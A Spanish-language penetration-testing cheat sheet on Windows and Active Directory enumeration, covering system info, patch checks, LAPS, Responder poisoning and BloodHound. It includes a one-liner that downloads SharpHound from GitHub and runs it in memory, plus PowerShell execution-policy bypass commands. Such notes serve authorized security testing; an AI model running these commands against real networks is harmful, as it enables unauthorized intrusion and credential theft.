Enumeracion

1. Enumeración de la máquina local

Sysinternals de Windows

Sysinternals Suite - Windows Sysinternals | Microsoft Docs

$ Get-ComputerInfo
  • Descargar en memoria scripts

$ iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1'))
  • comprobar si un equipo no tiene parches de seguridad instalados

$ HOSTNAME.EXE
$ Get-WmiObject -Class win32_OperatingSystem | select version,buildnumber
$ wmic qfe list full | findstr /i hotfix

En la web https://patchchecker.com/ podemos encontrar, según la versión de build de Windows, qué vulnerabilidades le afectarían debido a falta de actualizaciones, y puede ser usado para escalar privilegios.

2. Enumeración del dominio

Evadir las políticas de ejecución de Powershell

powershell.exe -executionpolicy bypass
powershell.exe -ep bypass
Set-ExecutionPolicy Unrestricted

  • Listar los usuarios del dominio

  • Listar los equipos del dominio

  • Listar los dominios del forest

  • Listar los tipos de "confianza" (trust) de los dominios/forest

  • La información de un grupo del dominio

  • Listar los miembros de un grupo del dominio

  • Listar shares del dominio, ignorando los default shares y check access

  • Listar política de contraseñas

  • Usuarios con el SID History (powerview)

  • Listar shares del dominio que el usuario actual tiene acceso

  • Comprobar configuracion de bitlocker

LAPS

  • Si LAPS se encuentra instalado en el equipo

  • Identificar si se encuentra instalado en el DC

  • Listar el atributo ms-mcs-admpwd

  • Lista el usuario o grupos que tienen permisos de lectura a la propiedad de LAPS para un equipo específico

  • Listar la ACL para todas las OU donde algún usuario tenga permisos de lectura sobre el atributo LAPS

Network poissoning

Una vez estamos conectados a la red de la infraestructura, con Responder podemos suplantar los servicios de LLMNR y NBT-NS, ya que se transmiten vía UDP

Bloodhound

Es la herramienta por excelencia para la enumeración de un dominio.

Para ello, se ha creado una sección explícita de la herramienta.

Last updated

Was this helpful?